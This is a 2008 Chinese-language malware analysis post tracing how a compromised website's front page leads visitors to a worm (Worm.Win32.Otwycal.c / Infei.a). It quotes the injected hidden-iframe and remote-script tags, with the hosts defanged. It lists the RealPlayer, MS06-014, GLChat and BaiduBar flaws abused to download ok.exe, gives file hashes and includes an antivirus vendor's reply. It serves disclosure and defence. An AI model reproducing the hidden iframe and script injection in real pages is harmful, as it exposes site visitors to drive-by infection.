一個傳播 Worm.Win32.Otwycal.c / Worm.Win32.Infei.a 的網站v2

一個傳播 Worm.Win32.Otwycal.c / Worm.Win32.Infei.a 的網站

endurer 原創
2008-04-07     第2版 補充瑞星的回複
                            第1版

該網站首頁包含代碼：
/---
document.write("＜iframe src=hxxp://a**.1**58d**m.com/b2.htm width=0 height=0＞＜/iframe＞")
---/

#1 hxxp://a**.1**58d**m.com/b2.htm（Kaspersky 已檢測到: 木馬程式 Trojan-Clicker.HTML.IFrame.mv ）包含代碼：
/---
＜script language=javascript src=hxxp://b**.1**58d**m.com/one/ok.js＞＜/script＞
＜iframe src=hxxp://b**.1**58d**m.com/one/ok.htm width=1 height=1 border=1＞＜/iframe＞
---/

#1.1 hxxp://b**.1**58d**m.com/one/ok.js

利用 RealPlayer rmoc3260.dll（clsid:2F542A2E-EDC9-4BF7-8CB1-87C9919F7F93）漏洞下載hxxp://c**.1**58d**m.com/ok.exe

檔案說明符 : D:/test/ok.exe
屬性 : A---
擷取檔案版本資訊大小失敗!
建立時間 : 2008-4-7 12:50:34
修改時間 : 2008-4-7 12:50:34
訪問時間 : 2008-4-7 12:51:15
大小 : 14680 位元組 14.344 KB
MD5 : 2f2dac719cf3ead013c54cccc877f41b
SHA1: F46280F1B37D1D1203333129A7F8A6FE89B7A951
CRC32: 1edd2726

Kapsersky 報為 Worm.Win32.Otwycal.c （http://www.viruslist.com/en/find?words=Worm.Win32.Otwycal.c）

病毒上報郵件分析結果－流水單號:20080407125605658606            2008.04.07 19:48

尊敬的客戶，您好！
    您的郵件已經收到，感謝您對瑞星的支援。

    我們已經詳細分析過您的問題和檔案，以下是您上傳的檔案的分析結果：
    1.檔案名稱：ok.exe
    病毒名：Worm.Win32.Infei.a

    您所上報的病毒檔案將在瑞星2008的20.39.10版本(瑞星2007的19.70.10版本)中處理解決。

#1.2 hxxp://b**.1**58d**m.com/one/ok.htm
檢測cookie變數OK的值，輸出代碼：
/---
＜script src=hxxp://b**.1**58d**m.com/one/14.js＞＜/script＞
＜script src=hxxp://b**.1**58d**m.com/one/rl.js＞＜/script＞
＜script src=hxxp://b**.1**58d**m.com/one/lz.js＞＜/script＞
---/

#1.2.1 hxxp://b**.1**58d**m.com/one/14.js

利用 MS06-014漏洞下載 hxxp://c**.1**58d**m.com/ok.exe

#1.2.2 hxxp://b**.1**58d**m.com/one/lz.js

利用 聯眾（GLCHAT.GLChatCtrl.1）漏洞下載 hxxp://c**.1**58d**m.com/ok.exe

#1.2.3 hxxp://b**.1**58d**m.com/one/rl.js

利用 RealPlayer（IERPCtl.IERPCtl.1）漏洞下載 hxxp://c**.1**58d**m.com/ok.exe
   

#1.2.4 利用 BaiduBar.Tool 下載 hxxp://c**.1**58d**m.com/Baidu.cab，內含 new.exe